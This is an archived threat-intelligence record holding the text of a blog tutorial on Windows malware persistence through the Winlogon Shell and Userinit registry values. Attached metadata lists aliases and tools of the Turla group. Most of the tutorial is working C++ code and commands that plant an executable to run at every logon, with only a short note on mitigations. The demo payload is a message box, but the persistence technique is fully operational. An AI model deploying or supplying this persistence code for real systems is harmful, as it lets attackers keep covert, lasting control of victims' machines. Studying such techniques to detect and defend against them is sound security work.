{ "id": "9a00da3e-db85-4bfa-8b52-64426c0ac6d9", "created_at": "2026-04-06T01:30:51.632098Z", "updated_at": "2026-04-10T13:12:17.049293Z", "deleted_at": null, "sha1_hash": "d108b16da45c62878d635efbf096587fe7b63b72", "title": "Malware development: persistence - part 7. Winlogon. Simple C++ example.", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 3160050, "plain_text": "Malware development: persistence - part 7. Winlogon. Simple C++\r\nexample.\r\nBy cocomelonc\r\nPublished: 2022-06-12 · Archived: 2026-04-06 00:08:32 UTC\r\n4 minute read\r\n﷽\r\nHello, cybersecurity enthusiasts and white hackers!\r\nToday I’ll write about the result of my own research into another persistence trick: Winlogon registry keys.\r\nwinlogonPermalink\r\nThe Winlogon process is responsible for user logon and logoff, startup and shutdown and locking the screen.\r\nAuthors of malware could alter the registry entries that the Winlogon process uses to achieve persistence.\r\nThe following registry keys must be modified in order to implement this persistence technique:\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit\r\nhttps://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html\r\nPage 1 of 20\n\nHowever, local administrator privileges are required to implement this technique.\r\npractical examplePermalink\r\nFirst of all create our malicious application ( hack.cpp ):\r\n/*\r\nmeow-meow messagebox\r\nauthor: @cocomelonc\r\n*/\r\n#include \u003cwindows.h\u003e\r\nint WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {\r\n MessageBoxA(NULL, \"Meow-meow!\",\"=^..^=\", MB_OK);\r\n return 0;\r\n}\r\nAs you can see, it’s just a pop-up “meow” message as usually.\r\nLet’s go to compile it:\r\nx86_64-w64-mingw32-g++ -O2 hack.cpp -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-s\r\nThe generated hack.exe needs to be dropped into the victim’s machine.\r\nChanges to the Shell registry key that include an malicious app will result in the execution of both\r\nexplorer.exe and hack.exe during Windows logon.\r\nThis can be done immediately using the script below:\r\n/*\r\npers.cpp\r\nwindows persistence via winlogon keys\r\nauthor: @cocomelonc\r\nhttps://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#include \u003cstring.h\u003e\r\nhttps://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html\r\nPage 2 of 20\n\nint main(int argc, char* argv[]) {\r\n HKEY hkey = NULL;\r\n // shell\r\n // const char* sh = \"explorer.exe,Z:\\\\2022-06-12-malware-pers-7\\\\hack.exe\";\r\n const char* sh = \"explorer.exe,hack.exe\";\r\n // startup\r\n LONG res = RegOpenKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)\"SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\r\n if (res == ERROR_SUCCESS) {\r\n // create new registry key\r\n // reg add \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v \"Shell\" /t REG_SZ /\r\n RegSetValueEx(hkey, (LPCSTR)\"Shell\", 0, REG_SZ, (unsigned char*)sh, strlen(sh));\r\n RegCloseKey(hkey);\r\n }\r\n return 0;\r\n}\r\nAlso, similar for Userinit . If this registry key include an malicious app will result in the execution of both\r\nuserinit.exe and hack.exe during Windows logon:\r\n/*\r\npers.cpp\r\nwindows persistence via winlogon keys\r\nauthor: @cocomelonc\r\nhttps://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#include \u003cstring.h\u003e\r\nint main(int argc, char* argv[]) {\r\n HKEY hkey = NULL;\r\n // userinit\r\n const char* ui = \"C:\\\\Windows\\\\System32\\\\userinit.exe,Z:\\\\2022-06-12-malware-pers-7\\\\hack.exe\";\r\n // startup\r\n LONG res = RegOpenKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)\"SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\r\n if (res == ERROR_SUCCESS) {\r\n // create new registry key\r\n // reg add \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v \"Shell\" /t REG_SZ /\r\n RegSetValueEx(hkey, (LPCSTR)\"Userinit\", 0, REG_SZ, (unsigned char*)ui, strlen(ui));\r\n RegCloseKey(hkey);\r\nhttps://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html\r\nPage 3 of 20\n\n}\r\n return 0;\r\n}\r\nSo, compile the program responsible for persistence:\r\nx86_64-w64-mingw32-g++ -O2 pers.cpp -o pers.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-s\r\ndemoPermalink\r\nAnd see everything in action. First of all, check registry keys:\r\nreg query \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /s\r\nhttps://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html\r\nPage 4 of 20\n\nCopy malicious app to C:\\Windows\\System32\\ . And run:\r\n.\\pers.exe\r\nhttps://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html\r\nPage 5 of 20\n\nThen, logout and login:\r\nhttps://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html\r\nPage 6 of 20\n\nAccording to the logic of the our malicious program, “meow-meow” popped up:\r\nhttps://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html\r\nPage 7 of 20\n\nLet’s check process properties via Process Hacker 2:\r\nhttps://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html\r\nPage 8 of 20\n\nThen, cleanup:\r\nreg add \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v \"Shell\" /t REG_SZ /d \"exp\r\nhttps://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html\r\nPage 9 of 20\n\nWhat about another key Userinit.exe ? Let’s check. Run:\r\n.\\pers.exe\r\nhttps://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html\r\nPage 10 of 20\n\nLogout and login:\r\nhttps://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html\r\nPage 11 of 20\n\nhttps://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html\r\nPage 12 of 20\n\nThen, for the purity of experiment, check properties of hack.exe in Process Hacker 2:\r\nhttps://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html\r\nPage 13 of 20\n\nAs you can see, parent process is winlogon.exe .\r\nCleanup:\r\nreg add \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v \"Userinit\" /t REG_SZ /d \"\r\nhttps://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html\r\nPage 14 of 20\n\nAs you can see in both cases, the malware will be executed during Windows authentication.\r\nBut there are interesting caveat. For example if we update registry key as following logic:\r\n/*\r\npers.cpp\r\nwindows persistence via winlogon keys\r\nauthor: @cocomelonc\r\nhttps://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#include \u003cstring.h\u003e\r\nint main(int argc, char* argv[]) {\r\n HKEY hkey = NULL;\r\n // shell\r\n const char* sh = \"explorer.exe,Z:\\\\2022-06-12-malware-pers-7\\\\hack.exe\";\r\nhttps://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html\r\nPage 15 of 20\n\n// startup\r\n LONG res = RegOpenKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)\"SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\r\n if (res == ERROR_SUCCESS) {\r\n // create new registry key\r\n // reg add \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v \"Shell\" /t REG_SZ /\r\n RegSetValueEx(hkey, (LPCSTR)\"Shell\", 0, REG_SZ, (unsigned char*)sh, strlen(sh));\r\n RegCloseKey(hkey);\r\n }\r\n return 0;\r\n}\r\nThat is, our malware is located along the path: Z:\\...\\hack.exe instead of C:\\Windows\\System32\\hack.exe .\r\nRun:\r\n.\\pers.exe\r\nreg query \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /s\r\nAnd relogin:\r\nhttps://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html\r\nPage 16 of 20\n\nhttps://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html\r\nPage 17 of 20\n\nChecking properties of hack.exe :\r\nhttps://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html\r\nPage 18 of 20\n\nAs you can see, parent process is Non-existent process . Parent will show as Non-existent process since\r\nuserinit.exe terminates itself.\r\nThere is one more note. Also, the Notify registry key is commonly present in older operating systems (prior to\r\nWindows 7 ) and it points to a notification package DLL file that manages Winlogon events. If you replace the\r\nDLL entries under this registry key with any other DLL, Windows will execute it during logon.\r\nWhat about mitigations? Limit user account privileges so that only authorized administrators can modify the\r\nWinlogon helper. Tools such as Sysinternals Autoruns may also be used to detect system modifications that may\r\nbe attempts at persistence, such as the listing of current Winlogon helper values.\r\nThis persistence trick is used by Turla group and software like Gazer and Bazaar in the wild.\r\nMITRE ATT\u0026CK - Boot or Logon Autostart Execution: Winlogon Helper DLL\r\nTurla\r\nGazer backdoor\r\nBazaar\r\nsource code on Github\r\nThis is a practical case for educational purposes only.\r\nhttps://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html\r\nPage 19 of 20\n\nThanks for your time happy hacking and good bye!\r\nPS. All drawings and screenshots are mine\r\nSource: https://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html\r\nhttps://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html\r\nPage 20 of 20", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html" ], "report_names": [ "malware-pers-7.html" ], "threat_actors": [ { "id": "8aaa5515-92dd-448d-bb20-3a253f4f8854", "created_at": "2024-06-19T02:03:08.147099Z", "updated_at": "2026-04-10T02:00:03.685355Z", "deleted_at": null, "main_name": "IRON HUNTER", "aliases": [ "ATK13 ", "Belugasturgeon ", "Blue Python ", "CTG-8875 ", "ITG12 ", "KRYPTON ", "MAKERSMARK ", "Pensive Ursa ", "Secret Blizzard ", "Turla", "UAC-0003 ", "UAC-0024 ", "UNC4210 ", "Venomous Bear ", "Waterbug " ], "source_name": "Secureworks:IRON HUNTER", "tools": [ "Carbon-DLL", "ComRAT", "LightNeuron", "Mosquito", "PyFlash", "Skipper", "Snake", "Tavdig" ], "source_id": "Secureworks", "reports": null }, { "id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac", "created_at": "2022-10-25T16:07:24.349252Z", "updated_at": "2026-04-10T02:00:04.949821Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "ATK 13", "Belugasturgeon", "Blue Python", "CTG-8875", "G0010", "Group 88", "ITG12", "Iron Hunter", "Krypton", "Makersmark", "Operation Epic Turla", "Operation Moonlight Maze", "Operation Penguin Turla", "Operation Satellite Turla", "Operation Skipper Turla", "Operation Turla Mosquito", "Operation WITCHCOVEN", "Pacifier APT", "Pensive Ursa", "Popeye", "SIG15", "SIG2", "SIG23", "Secret Blizzard", "TAG-0530", "Turla", "UNC4210", "Venomous Bear", "Waterbug" ], "source_name": "ETDA:Turla", "tools": [ "ASPXSpy", "ASPXTool", "ATI-Agent", "AdobeARM", "Agent.BTZ", "Agent.DNE", "ApolloShadow", "BigBoss", "COMpfun", "Chinch", "Cloud Duke", "CloudDuke", "CloudLook", "Cobra Carbon System", "ComRAT", "DoublePulsar", "EmPyre", "EmpireProject", "Epic Turla", "EternalBlue", "EternalRomance", "GoldenSky", "Group Policy Results Tool", "HTML5 Encoding", "HyperStack", "IcedCoffee", "IronNetInjector", "KSL0T", "Kapushka", "Kazuar", "KopiLuwak", "Kotel", "LOLBAS", "LOLBins", "LightNeuron", "Living off the Land", "Maintools.js", "Metasploit", "Meterpreter", "MiamiBeach", "Mimikatz", "MiniDionis", "Minit", "NBTscan", "NETTRANS", "NETVulture", "Neptun", "NetFlash", "NewPass", "Outlook Backdoor", "Penquin Turla", "Pfinet", "PowerShell Empire", "PowerShellRunner", "PowerShellRunner-based RPC backdoor", "PowerStallion", "PsExec", "PyFlash", "QUIETCANARY", "Reductor RAT", "RocketMan", "SMBTouch", "SScan", "Satellite Turla", "SilentMoon", "Sun rootkit", "TTNG", "TadjMakhal", "Tavdig", "TinyTurla", "TinyTurla Next Generation", "TinyTurla-NG", "Topinambour", "Tunnus", "Turla", "Turla SilentMoon", "TurlaChopper", "Uroburos", "Urouros", "WCE", "WITCHCOVEN", "WhiteAtlas", "WhiteBear", "Windows Credential Editor", "Windows Credentials Editor", "Wipbot", "WorldCupSec", "XTRANS", "certutil", "certutil.exe", "gpresult", "nbtscan", "nbtstat", "pwdump" ], "source_id": "ETDA", "reports": null }, { "id": "a97fee0d-af4b-4661-ae17-858925438fc4", "created_at": "2023-01-06T13:46:38.396415Z", "updated_at": "2026-04-10T02:00:02.957137Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "TAG_0530", "Pacifier APT", "Blue Python", "UNC4210", "UAC-0003", "VENOMOUS Bear", "Waterbug", "Pfinet", "KRYPTON", "Popeye", "SIG23", "ATK13", "ITG12", "Group 88", "Uroburos", "Hippo Team", "IRON HUNTER", "MAKERSMARK", "Secret Blizzard", "UAC-0144", "UAC-0024", "G0010" ], "source_name": "MISPGALAXY:Turla", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3", "created_at": "2022-10-25T15:50:23.509601Z", "updated_at": "2026-04-10T02:00:05.277674Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "Turla", "IRON HUNTER", "Group 88", "Waterbug", "WhiteBear", "Krypton", "Venomous Bear", "Secret Blizzard", "BELUGASTURGEON" ], "source_name": "MITRE:Turla", "tools": [ "PsExec", "nbtstat", "ComRAT", "netstat", "certutil", "KOPILUWAK", "IronNetInjector", "LunarWeb", "Arp", "Uroburos", "PowerStallion", "Kazuar", "Systeminfo", "LightNeuron", "Mimikatz", "Tasklist", "LunarMail", "HyperStack", "NBTscan", "TinyTurla", "Penquin", "LunarLoader" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775439051, "ts_updated_at": 1775826737, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/d108b16da45c62878d635efbf096587fe7b63b72.pdf", "text": "https://archive.orkl.eu/d108b16da45c62878d635efbf096587fe7b63b72.txt", "img": "https://archive.orkl.eu/d108b16da45c62878d635efbf096587fe7b63b72.jpg" } }